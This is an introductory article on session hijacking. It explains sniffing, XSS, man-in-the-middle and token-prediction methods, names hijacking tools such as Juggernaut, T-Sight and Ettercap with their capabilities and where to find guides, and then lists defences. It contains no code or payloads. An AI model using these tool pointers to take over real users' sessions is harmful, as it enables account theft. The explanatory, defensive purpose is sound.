Session hijacking involves the theft of another's internet session, thereby allowing the attacker to impersonate the original user. Falling victim to a session hijacking attack could prove catastrophic because it may enable the attacker to perform any task that you, the victim, would be able to perform.
In this article I explain what session hijacking entails, and detail some of the more favoured methods for compromising a session token. I also discuss three of the tools most commonly used to perform such attacks and outline some prevention measures that you might implement, in either your home or place of business, in order to avoid becoming a victim of such an attack.
WHAT SESSION HIJACKING INVOLVES
At its most basic level, session hijacking involves the taking over of a victim's active internet session by covertly obtaining the victim's session token. Once the victim's session token has been accessed, the attacker can masquerade as the victim, and perform any tasks that the victim is authorized to perform.
The session token required to perform a hijack is normally stored within an internet cookie or URL. For most communications, authentication procedures are carried out at start up. The process of session hijacking takes advantage of this practice by intruding into the web session in real time. The ability to detect such an intrusion is dependent on both the technical knowledge of the victim and the specific nature of the attack.
ACTIVE AND PASSIVE ATTACKS
There are two broad forms of session hijack attacks which are known respectively as an active and a passive attack. An active attack involves the identification, attack, and successful takeover of an active internet session. It is regarded as the more advanced form one of attack, due to the higher level of skill which it entails.
A passive attack involves the attacker monitoring the traffic being sent across the victim's network and, as such, is nothing more than an advanced form of network sniffing. The attacker gathers information, such as login information, and then uses that information to authenticate in a separate session.
COMPROMISING SESSION TOKENS
Common methods employed in stealing a valid session token are: session sniffing; client-side attacks; man-in-the-middle attacks; and session prediction. Each of these is discussed below.
Session sniffing is the easiest approach to capturing a valid session token. It involves the monitoring of network traffic being sent between the victim's terminal and the server that the victim is connecting to, Monitoring this traffic allows the attacker to easily gather a wide range of sensitive data, including information regarding the session token as well as login details to various websites and services.
Another common means of gaining access to a session token, and other personal data, is for the attacker to use a client-side attack. One of the most common client-side-attacks involves infecting the intended victim's terminal with a malware application, such as a Trojan or Virus. This application then gives the attacker access to the target's data and allows the copying, editing and deletion of any file on the
target's computer, The cross-site script (XSS) attack is another example of a client
side attack. An XSS attack occurs when an attacker sends a URL containing malicious javascript code to a potential victim. If the target navigates to the link, the malicious javascript code will be executed, resulting in a copy of the target's session token being sent to the attacker.
A man-in-the-middle attack (MITM) occurs when the attacker intercepts communications between two systems, and then assumes the role of a proxy between both parties. The attacker does this by splitting the connection into two new links: one between the server and the attacker, and the other between the attacker and the victim. By acting as a proxy for all communications between the two parties, the attacker is able to read and modify the data that is sent between the victim and the server, including the session token.
A session prediction attack, which is, in my opinion, the most amateurish of attack methods, involves the attacker trying to guess the active session's token. The attacker does this by analysing both the means by which the session token is generated and the algorithms that are used to protect it. Once an attacker understands this process, they are able to predict a valid session token value and gain access to that session, Some simple, highly vulnerable session tokens may comprise predictable information such as timestamps and usernames. Employing such basic session token assignment schemes is extremely dangerous and should be avoided!
TOOLS EMPLOYED BY ATTACKERS
There are a variety of applications that can be used to sniff networks and hijack active sessions, Three of the most commonly employed applications are as follows.
Juggernaut is a network sniffer that was developed for Linux operating systems. Juggernaut allows the user to monitor all network traffic, or alternatively, to scan network traffic for specific keywords, such as usernames, website addresses or passwords. juggernaut also allows the user to view information regarding all active network sessions, and provides the user with the option of hijacking any of these sessions. Juggernaut is a free-to¬use application and installation guides are available on a variety of websites; a basic Google search should be sufficient to find one of these guides.
A second application is T-Sight, which is a network scanning and session hijacking tool designed for use within the Microsoft Windows environment. T-Sight allows the user to monitor all data being passed over a network. When a session id has been captured, a single button click allows the attacker to hijack the session. In an attempt to prevent T-Sight being used for illegal purposes, Engarde, the company that produces and distributes T-Sight, only licenses the software to pre-determined IP addresses.
Finally, Ettercap is a free and open source network security tool that allows the user to perform man-in¬the middle attacks over Local Area Networks (LANs). Ettercap is compatible with a range of operating systems, including Linux,
Mac OS X, Solaris and
Microsoft Windows. It was ranked number 11 on the Top 100
Network Security Tools list of 2006. Ettercap is one of the most advanced sniffing tools available. It allows the attacker to analyse traffic using a variety of different methods, and enables the efficient location of information in the shortest possible timeframe. While Ettercap is arguably the most advanced of the three applications I have outlined, there are some known issues with its stability when operating within a Windows environment. However, it operates perfectly in Kali, a Linux distribution designed for penetration testers.
PREVENTING AN ATTACK
The following preventative measures can be taken to minimise the risk of being subjected to a session hijacking attack.
ENCRYPTION
The encryption of data, including the session token, passing between both parties can significantly reduce the chances of a successful session hijack attack. Encryption can be employed using a cryptographic protocol such as Transport Layer Security (TLS) or Secure Sockets Layer (SSL). Encryption is heavily relied upon by most web-based banking applications and e-commerce services, including eBay and Freelancer. A relatively effortless means of employing encryption is to download and install the browser add-on, HTTPS Everywhere. This is the same software that is used by the Tor Project to enforce browser encryption within the Tor network. It should be noted that while encryption will dramatically reduce the effectiveness of sniffing-style attacks, there is still the potential for a session hijack to occur if the attacker uses a different method to gain access to the session token.
CONNECTIONS
Another way to mitigate the risk of having your session hijacked is to limit the number of remote connections to your network, This can be done by using a Virtual Private Network (VPN) server. This enable authorised users to connect to your network from an offsite location. Employing a VPN server adds an extra layer of protection between users and your network. When combined with SSL encryption, a VPN server, acting as a middleman between your users personal terminals and your network, should offer sufficient protection against session hijacks in the majority of cases.
ANTI-VIRUS SOFTWARE
Making sure that up-to-date anti-virus software is installed an networked computers will help prevent the network being infected by malware. As discussed, malware can be used by an attacker to steal a session token.
EMPLOYEE EDUCATION
Educating employees as to procedures for safe internet use can be boring but nonetheless highly effective in preventing a range of attacks. Educating your employees about the different types of malware, how malware is spread (seam email, infected files etc.) and proper browsing habits, will assist in preventing infections that could spread across your network and reap havoc.
CONCLUSION
Whether you are operating on your personal, home, or business network, the threat of session hijacking attacks is very real. While a successful attack can be devastating to you and your business, the measures outlined in this article can assist in reducing the likelihood of an attack being effective.